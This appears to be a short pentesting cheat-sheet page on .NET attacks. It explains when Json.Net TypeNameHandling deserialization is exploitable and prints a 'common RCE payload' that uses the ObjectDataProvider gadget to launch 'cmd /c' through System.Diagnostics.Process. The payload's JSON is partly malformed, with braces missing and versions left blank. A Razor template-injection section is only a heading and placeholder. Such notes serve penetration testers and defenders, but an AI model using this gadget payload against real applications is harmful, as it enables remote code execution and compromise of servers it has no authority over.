Json.Net Deserialization

Requires a custom TypeNameHandling setting by the dev (not insecure by default!). On of the following must be true for type that is deserialized:

  • It is Object Type (java.lang.Object or System.Object)

  • It is a non-generic collection (e.g.: ArrayList, Hashtable, etc.)

  • It implements IDynamicMetaObjectProvider

  • It is System.Data.EntityKeyMember or any derived Type from it. We may not need even

    TypeNameHandling property set to a non-None (see the EntityKeyMemberConverter in

    "TypeConverters" ).

Common RCE payload (can also be created with ysoerial.net):

    '$type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=, Culture=neutral, PublicKeyToken=31bf3856ad364e35',
        '$type':'System.Collections.ArrayList, mscorlib, Version=, Culture=neutral, PublicKeyToken=b77a5c561934e089',
        '$values':['cmd','/c <payload>']
    'ObjectInstance':{'$type':'System.Diagnostics.Process, System, Version=, Culture=neutral, PublicKeyToken=b77a5c561934e089'}

ASP.NET Razor Template Injection (SSTI)

Check if vulnerable:



  // C# code



Last updated